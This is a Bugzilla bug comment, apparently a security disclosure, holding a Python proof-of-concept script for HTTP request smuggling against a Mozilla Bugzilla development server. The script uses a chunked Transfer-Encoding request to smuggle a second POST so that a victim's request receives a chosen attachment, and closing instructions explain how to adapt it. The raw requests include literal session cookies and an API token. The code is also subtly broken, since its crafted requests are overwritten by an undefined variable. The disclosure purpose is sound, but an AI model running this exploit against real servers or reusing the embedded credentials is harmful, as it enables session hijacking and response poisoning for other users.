Bug 1554177 Comment 1 Edit History

Note: The actual edited comment in the bug view page will always show the original commenter’s name and original timestamp.

Original comment by
on
(Hidden by Administrator)
Revision 1 by
on 
Here's a script I successfully used to demonstrate causing an arbitrary response: 

```python
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint='https://bugzilla-dev.allizom.org:443',
                           concurrentConnections=5,
                           requestsPerConnection=1,
                           resumeSSL=False,
                           timeout=10,
                           pipeline=False,
                           maxRetriesPerRequest=0
                           )
    engine.start()

    attack = '''POST /home HTTP/1.1
Fooz: bar
Transfer-Encoding: chunked
Host: bugzilla-dev.allizom.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: Bugzilla_login=454982; Bugzilla_logincookie=Ix3NYbZBCJ1YPtzvxi24s9; VERSION-Firefox=1.5.0.x%20Branch
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 767
Foo: bar

0

POST /attachment.cgi?id=9155360&t=zUM7YAZi5WW38hKjoYI8D8 HTTP/1.1
Host: bug1395564.bmoattachments.bugzilla-dev.allizom.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://bugzilla-dev.allizom.org/show_bug.cgi?id=1395564
X-Forwarded-Host: cow.com
X-Requested-With: XMLHttpRequest
X-Forwarded-For: 81.139.39.150
X-Forwarded-Port: 443
X-Forwarded-Proto: https
Connection: close
Cookie: Bugzilla_login=454982; Bugzilla_logincookie=Ix3NYbZBCJ1YPtzvxi24s9; VERSION-Firefox=1.5.0.x%20Branch
Content-Type: application/x-www-form-urlencoded
Content-Length: 740

Bugzilla_api_token=hkvtOvKDAeEDu5txHfUPBo&text=foobar'''

    victim = '''POST /home HTTP/1.1
Fooz: bar
Transfer-Encoding: chunked
Host: bugzilla-dev.allizom.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: Bugzilla_login=454982; Bugzilla_logincookie=Ix3NYbZBCJ1YPtzvxi24s9; VERSION-Firefox=1.5.0.x%20Branch
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Foo: bar

0

'''

    # The request engine will auto-fix the content-length for us
    attack = target.req + prefix
    engine.queue(attack)

    victim = target.req
    for i in range(14):
        engine.queue(victim)
        time.sleep(0.05)


def handleResponse(req, interesting):
    table.add(req)
```

You should see that one victim POST request to `bugzilla-dev.allizom.org` gets the contents of the attachment. To make this PoC work for you, you'll need to create a bug, create a malicious attachment, and update the URL and Host header in the smuggled request to contain your attachment ID, bug ID, and attachment token. Please note that the attachment token is either single use or expires very quickly.

Back to Bug 1554177 Comment 1